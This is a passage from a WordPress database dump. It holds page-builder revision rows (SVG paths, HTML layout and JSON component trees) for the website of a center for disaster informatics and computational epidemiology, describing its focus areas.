d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:36:34','2022-02-16 18:36:34','',22,'https://gsudice.dataconn.net/?p=405',0,'revision','',0),(409,1,'2022-02-16 18:36:59','2022-02-16 18:36:59','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c31\",\"parentId\":\"20-c30\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c32\",\"parentId\":\"20-c30\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c30\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c28\",\"parentId\":\"20-c26\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c28\",\"index\":0,\"id\":\"20-c29\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c26\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:36:59','2022-02-16 18:36:59','',168,'https://gsudice.dataconn.net/?p=409',0,'revision','',0),(410,1,'2022-02-16 18:36:59','2022-02-16 18:36:59','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c30\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c30 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c31-outer\">\n <div data-colibri-id=\"20-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c32-outer\">\n <div data-colibri-id=\"20-c32\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c26\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c26 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c28-outer\">\n <div data-colibri-id=\"20-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c29\" class=\"h-global-transition-all h-heading style-334 style-local-20-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 style-local-20-c29\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:36:59','2022-02-16 18:36:59','',20,'https://gsudice.dataconn.net/?p=410',0,'revision','',0),(411,1,'2022-02-16 18:36:59','2022-02-16 18:36:59','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 